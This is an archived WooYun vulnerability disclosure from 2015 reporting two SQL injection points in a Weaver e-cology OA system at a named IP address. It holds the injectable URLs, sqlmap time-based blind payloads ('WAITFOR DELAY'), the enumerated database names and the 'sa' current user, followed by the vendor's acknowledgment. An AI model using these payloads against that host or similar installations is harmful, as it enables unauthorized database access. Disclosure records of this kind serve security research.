乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-01: 细节已通知厂商并且等待厂商处理中 2015-09-02: 厂商已经确认,细节仅向厂商公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
sql注入
泛微系统http://60.10.8.227:88/login/Login.jsp?logintype=1
第一处:
http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5 WAITFOR DELAY '0:0:5'&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415='---[00:18:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2008
数据库
available databases [8]:[*] ecology7[*] ecology_bak0119[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
当期库ecology7当期用户sa第二处
http://60.10.8.227:88//homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://60.10.8.227:88//homepage/LoginHomepage.jsp?hpid=52 WAITFOR DELAY '0:0:5'&isfromportal=1---[00:22:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2008
危害等级:中
漏洞Rank:10
确认时间:2015-09-02 10:41
感谢路人甲同学的关注与贡献!马上通知业务整改!请私信留Q联系。谢谢!
暂无